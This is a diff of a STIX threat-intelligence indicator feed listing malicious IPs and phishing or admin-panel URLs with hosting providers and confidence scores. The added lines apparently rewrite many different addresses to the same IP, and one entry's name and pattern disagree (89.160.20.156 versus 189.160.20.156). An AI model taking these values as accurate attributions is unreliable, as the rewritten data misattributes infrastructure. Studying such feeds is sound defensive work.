CyberCrime","id":"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-06T02:10:23.024Z","name":"mal_ip: 91.215.169.220","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.220']","type":"indicator","valid_from":"2020-02-06T02:10:23.024Z"} +{"created":"2020-02-06T02:10:23.024Z","description":"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-06T02:10:23.024Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-06T02:10:23.024Z"} {"created":"2020-02-06T02:10:35.597Z","description":"TS ID: 55290730780; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--524c1a55-264d-4f41-a854-1f0601921675","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-06T02:10:35.597Z","name":"mal_url: http://f0378370.xsph.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0378370.xsph.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:10:35.597Z"} -{"created":"2020-02-06T02:10:59.132Z","description":"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:10:59.132Z","name":"mal_url: http://85.204.116.145/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.145/login']","type":"indicator","valid_from":"2020-02-06T02:10:59.132Z"} +{"created":"2020-02-06T02:10:59.132Z","description":"TS ID: 55290730787; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--d8d588e2-5ab4-4937-9051-ae93e79c0204","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:10:59.132Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:10:59.132Z"} {"created":"2020-02-06T02:11:08.205Z","description":"TS ID: 55290730776; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6b38040c-6578-43c4-8cec-a426d1079a96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-06T02:11:08.205Z","name":"mal_url: http://f0396918.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0396918.xsph.ru/login']","type":"indicator","valid_from":"2020-02-06T02:11:08.205Z"} {"created":"2020-02-06T02:11:15.653Z","description":"TS ID: 55290730807; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--22ba0c46-ef00-43cc-a2e1-ff75417cf11d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-06T02:11:15.653Z","name":"mal_url: http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cup/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:11:15.653Z"} {"created":"2020-02-06T02:11:17.072Z","description":"TS ID: 55290730801; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--257bcf28-e6ee-46e8-b9fe-d192fdc7c959","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:11:17.072Z","name":"mal_url: http://l5056942.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l5056942.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:17.072Z"} @@ -353,39 +353,39 @@ {"created":"2020-02-06T02:11:27.123Z","description":"TS ID: 55290730782; iType: mal_url; State: active; Org: Hotwire Fision; Source: CyberCrime","id":"indicator--29909afa-ad21-493c-b420-870dbc8dd0da","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:11:27.123Z","name":"mal_url: http://tranpip.com/vla/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tranpip.com/vla/panel/admin.php']","type":"indicator","valid_from":"2020-02-06T02:11:27.123Z"} {"created":"2020-02-06T02:11:37.189Z","description":"TS ID: 55290730803; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eb5264f6-1f6e-4d1e-a813-d668ef8e6e0e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:11:37.189Z","name":"mal_url: http://l1430a3c.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l1430a3c.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:11:37.189Z"} {"created":"2020-02-06T02:12:51.488Z","description":"TS ID: 55290730778; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--c5829f98-8034-4bab-b591-9d3fbda9f448","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:12:51.488Z","name":"mal_url: http://f0391270.xsph.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391270.xsph.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-02-06T02:12:51.488Z"} -{"created":"2020-02-06T02:12:52.562Z","description":"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:12:52.562Z","name":"mal_url: http://85.204.116.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://85.204.116.144/login']","type":"indicator","valid_from":"2020-02-06T02:12:52.562Z"} +{"created":"2020-02-06T02:12:52.562Z","description":"TS ID: 55290730800; iType: mal_url; State: active; Org: N-b Tv Sat Srl; Source: CyberCrime","id":"indicator--14575771-256c-4f2f-b4bc-7b96c6805b24","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:12:52.562Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:12:52.562Z"} {"created":"2020-02-06T02:13:24.038Z","description":"TS ID: 55290730798; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--41ca379f-0e97-452f-bed7-0dcaa6509a87","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-06T02:13:24.038Z","name":"mal_url: http://xmpzi.icu/blue/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xmpzi.icu/blue/index.php']","type":"indicator","valid_from":"2020-02-06T02:13:24.038Z"} {"created":"2020-02-06T02:13:26.405Z","description":"TS ID: 55290730786; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--5b354705-abe0-4b58-b088-aba7ddc92d6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-35"],"modified":"2020-02-06T02:13:26.405Z","name":"mal_url: http://155.94.210.79/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://155.94.210.79/login']","type":"indicator","valid_from":"2020-02-06T02:13:26.405Z"} {"created":"2020-02-06T02:14:04.592Z","description":"TS ID: 55290730804; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6f406e7c-e62d-4431-b7eb-d8bc42d48b54","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-06T02:14:04.592Z","name":"mal_url: http://lf9a7e2b.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf9a7e2b.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:04.592Z"} -{"created":"2020-02-06T02:14:13.434Z","description":"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:14:13.434Z","name":"mal_url: http://5.188.60.16/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.16/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.434Z"} -{"created":"2020-02-06T02:14:13.474Z","description":"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-16"],"modified":"2020-02-06T02:14:13.474Z","name":"mal_ip: 137.74.20.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '137.74.20.60']","type":"indicator","valid_from":"2020-02-06T02:14:13.474Z"} +{"created":"2020-02-06T02:14:13.434Z","description":"TS ID: 55290730806; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1a0f27f7-a8a7-4dd5-b5cc-a7146221fc31","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-06T02:14:13.434Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.434Z"} +{"created":"2020-02-06T02:14:13.474Z","description":"TS ID: 55290730796; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--72bcbdc1-6c42-4fe9-b6b2-2a8519672418","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-16"],"modified":"2020-02-06T02:14:13.474Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-06T02:14:13.474Z"} {"created":"2020-02-06T02:14:13.506Z","description":"TS ID: 55290730793; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a2c76402-f9d0-4ea1-9ed0-b035bce4c7a6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:14:13.506Z","name":"mal_url: http://tikkies.eu/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tikkies.eu/login']","type":"indicator","valid_from":"2020-02-06T02:14:13.506Z"} {"created":"2020-02-06T02:14:14.285Z","description":"TS ID: 55290730805; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--2e110e0c-f7af-4738-bed2-057bebad6f44","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:14:14.285Z","name":"mal_url: http://lb1a9935.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lb1a9935.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-02-06T02:14:14.285Z"} -{"created":"2020-02-06T02:14:30.841Z","description":"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime","id":"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-06T02:14:30.841Z","name":"mal_url: http://69.61.38.147/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://69.61.38.147/login']","type":"indicator","valid_from":"2020-02-06T02:14:30.841Z"} -{"created":"2020-02-07T01:58:49.531Z","description":"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.531Z","name":"mal_url: http://107.175.150.73/~giftioz/.golob/ds.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.golob/ds.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.531Z"} -{"created":"2020-02-07T01:58:49.782Z","description":"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--44a6ba7f-2847-45c5-b4f3-452582094240","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.782Z","name":"mal_url: http://107.175.150.73/~giftioz/.jonovis/xr.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.jonovis/xr.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.782Z"} -{"created":"2020-02-07T01:59:00.621Z","description":"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime","id":"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-07T01:59:00.621Z","name":"mal_url: http://194.32.79.80/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://194.32.79.80/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-07T01:59:00.621Z"} -{"created":"2020-02-07T02:01:59.646Z","description":"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--a8895396-ac11-49f3-bb81-6e854b871870","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:01:59.646Z","name":"mal_url: http://107.175.150.73/~giftioz/.fotoci/ji.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.fotoci/ji.php']","type":"indicator","valid_from":"2020-02-07T02:01:59.646Z"} -{"created":"2020-02-07T02:02:24.529Z","description":"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:02:24.529Z","name":"mal_url: http://107.175.150.73/~giftioz/.hokbi/cv.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.hokbi/cv.php']","type":"indicator","valid_from":"2020-02-07T02:02:24.529Z"} -{"created":"2020-02-08T14:02:11.92Z","description":"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--0e0304f5-9735-4c6d-a860-95633369db34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:02:11.92Z","name":"mal_ip: 91.215.169.50","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.50']","type":"indicator","valid_from":"2020-02-08T14:02:11.92Z"} -{"created":"2020-02-08T14:02:14.399Z","description":"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-08T14:02:14.399Z","name":"mal_ip: 47.254.179.14","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.254.179.14']","type":"indicator","valid_from":"2020-02-08T14:02:14.399Z"} +{"created":"2020-02-06T02:14:30.841Z","description":"TS ID: 55290730788; iType: mal_url; State: active; Org: Cyber Wurx LLC; Source: CyberCrime","id":"indicator--20a1654d-6008-4d85-a2f0-cc9eaadabe43","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-23"],"modified":"2020-02-06T02:14:30.841Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:14:30.841Z"} +{"created":"2020-02-07T01:58:49.531Z","description":"TS ID: 55295317584; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--e9848e5a-4cbf-4156-827d-b0e0e73d9f2e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.531Z","name":"mal_url: http://89.160.20.156/~giftioz/.golob/ds.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.golob/ds.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.531Z"} +{"created":"2020-02-07T01:58:49.782Z","description":"TS ID: 55295317585; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--44a6ba7f-2847-45c5-b4f3-452582094240","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T01:58:49.782Z","name":"mal_url: http://89.160.20.156/~giftioz/.jonovis/xr.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.jonovis/xr.php']","type":"indicator","valid_from":"2020-02-07T01:58:49.782Z"} +{"created":"2020-02-07T01:59:00.621Z","description":"TS ID: 55295317581; iType: mal_url; State: active; Org: MVPS LTD; Source: CyberCrime","id":"indicator--dad51188-cf4b-4585-8fe2-bfeb4ab3a864","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-07T01:59:00.621Z","name":"mal_url: http://89.160.20.156/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://189.160.20.156/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-07T01:59:00.621Z"} +{"created":"2020-02-07T02:01:59.646Z","description":"TS ID: 55295317582; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--a8895396-ac11-49f3-bb81-6e854b871870","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:01:59.646Z","name":"mal_url: http://89.160.20.156/~giftioz/.fotoci/ji.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.fotoci/ji.php']","type":"indicator","valid_from":"2020-02-07T02:01:59.646Z"} +{"created":"2020-02-07T02:02:24.529Z","description":"TS ID: 55295317583; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--2d0ab756-16e3-4679-86d9-b5ef1bc14a32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-02-07T02:02:24.529Z","name":"mal_url: http://89.160.20.156/~giftioz/.hokbi/cv.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/~giftioz/.hokbi/cv.php']","type":"indicator","valid_from":"2020-02-07T02:02:24.529Z"} +{"created":"2020-02-08T14:02:11.92Z","description":"TS ID: 55298072069; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--0e0304f5-9735-4c6d-a860-95633369db34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-22"],"modified":"2020-02-08T14:02:11.92Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:11.92Z"} +{"created":"2020-02-08T14:02:14.399Z","description":"TS ID: 55298070452; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--7af00858-9e0a-437b-af35-a4ef0b6527a5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-02-08T14:02:14.399Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:14.399Z"} {"created":"2020-02-08T14:02:17.271Z","description":"TS ID: 55298068887; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--257cd2f9-ce06-4091-83e2-63d61b7e8bfa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-08T14:02:17.271Z","name":"mal_url: http://smineolo39wings.in/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://smineolo39wings.in/login']","type":"indicator","valid_from":"2020-02-08T14:02:17.271Z"} {"created":"2020-02-08T14:02:23Z","description":"TS ID: 55298071788; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--8438ae84-2b7d-4fea-b1cd-fbec85ea3e58","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-08T14:02:23Z","name":"mal_url: http://go.trust-oot.info/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://go.trust-oot.info/login']","type":"indicator","valid_from":"2020-02-08T14:02:23Z"} -{"created":"2020-02-08T14:02:23.507Z","description":"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-08T14:02:23.507Z","name":"mal_url: http://178.62.186.112/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.186.112/login']","type":"indicator","valid_from":"2020-02-08T14:02:23.507Z"} -{"created":"2020-02-08T14:02:23.547Z","description":"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:02:23.547Z","name":"mal_ip: 5.188.231.89","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '5.188.231.89']","type":"indicator","valid_from":"2020-02-08T14:02:23.547Z"} +{"created":"2020-02-08T14:02:23.507Z","description":"TS ID: 55298070914; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--7f6369a7-af79-45ca-96e4-3e5c309337de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-08T14:02:23.507Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-08T14:02:23.507Z"} +{"created":"2020-02-08T14:02:23.547Z","description":"TS ID: 55298068879; iType: mal_ip; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--e1a9f3d2-0a84-4814-bac9-c9e60ad73cca","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-08T14:02:23.547Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:23.547Z"} {"created":"2020-02-08T14:02:33.679Z","description":"TS ID: 55298069345; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--1aa4e592-6c78-43e8-b47c-2494a948d25c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-08T14:02:33.679Z","name":"mal_url: http://f0391897.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391897.xsph.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:33.679Z"} -{"created":"2020-02-08T14:02:53.996Z","description":"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-08T14:02:53.996Z","name":"mal_ip: 190.14.38.202","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '190.14.38.202']","type":"indicator","valid_from":"2020-02-08T14:02:53.996Z"} +{"created":"2020-02-08T14:02:53.996Z","description":"TS ID: 55298070323; iType: mal_ip; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--0140ac57-a9a4-408a-9f53-f5b33f85dc80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-08T14:02:53.996Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-08T14:02:53.996Z"} {"created":"2020-02-08T14:02:57.507Z","description":"TS ID: 55298070037; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--46c21251-c655-40c1-896d-2f4712091b7b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-08T14:02:57.507Z","name":"mal_url: http://nikitakoteqka1.myjino.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nikitakoteqka1.myjino.ru/login']","type":"indicator","valid_from":"2020-02-08T14:02:57.507Z"} {"created":"2020-02-08T14:02:59.236Z","description":"TS ID: 55298072047; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--7921e9e8-393c-4b0d-888f-bea034112f06","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-08T14:02:59.236Z","name":"mal_url: http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xgkxc.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-08T14:02:59.236Z"} {"created":"2020-02-08T14:02:59.246Z","description":"TS ID: 55298071436; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--a59774c5-c288-44a0-9eab-28d93c5d0ab4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-08T14:02:59.246Z","name":"mal_url: http://100stuff.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://100stuff.site/login']","type":"indicator","valid_from":"2020-02-08T14:02:59.246Z"} -{"created":"2020-02-08T14:02:59.31Z","description":"TS ID: 55298071076; iType: mal_ip; State: active; Org: RouteLabel V.O.F.; Source: CyberCrime","id":"indicator--d74f403a-0673-4594-a4fc-61a22ab7fa21","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-30"],"modified":"2020-02-08T14:02:59.31Z","name":"mal_ip: 81.4.100.75","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '81.4.100.75']","type":"indicator","valid_from":"2020-02-08T14:02:59.31Z"} -{"created":"2020-02-08T14:02:59.432Z","description":"TS ID: 55298069175; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: 